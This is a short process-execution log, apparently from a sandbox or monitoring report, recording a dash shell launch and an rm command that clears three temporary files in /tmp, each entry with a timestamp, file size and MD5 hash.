Start date (UTC):09/04/2025
Path:/usr/bin/dash
Arguments:-
File size:129816 bytes
MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/rm
Arguments:rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
File size:72056 bytes
MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b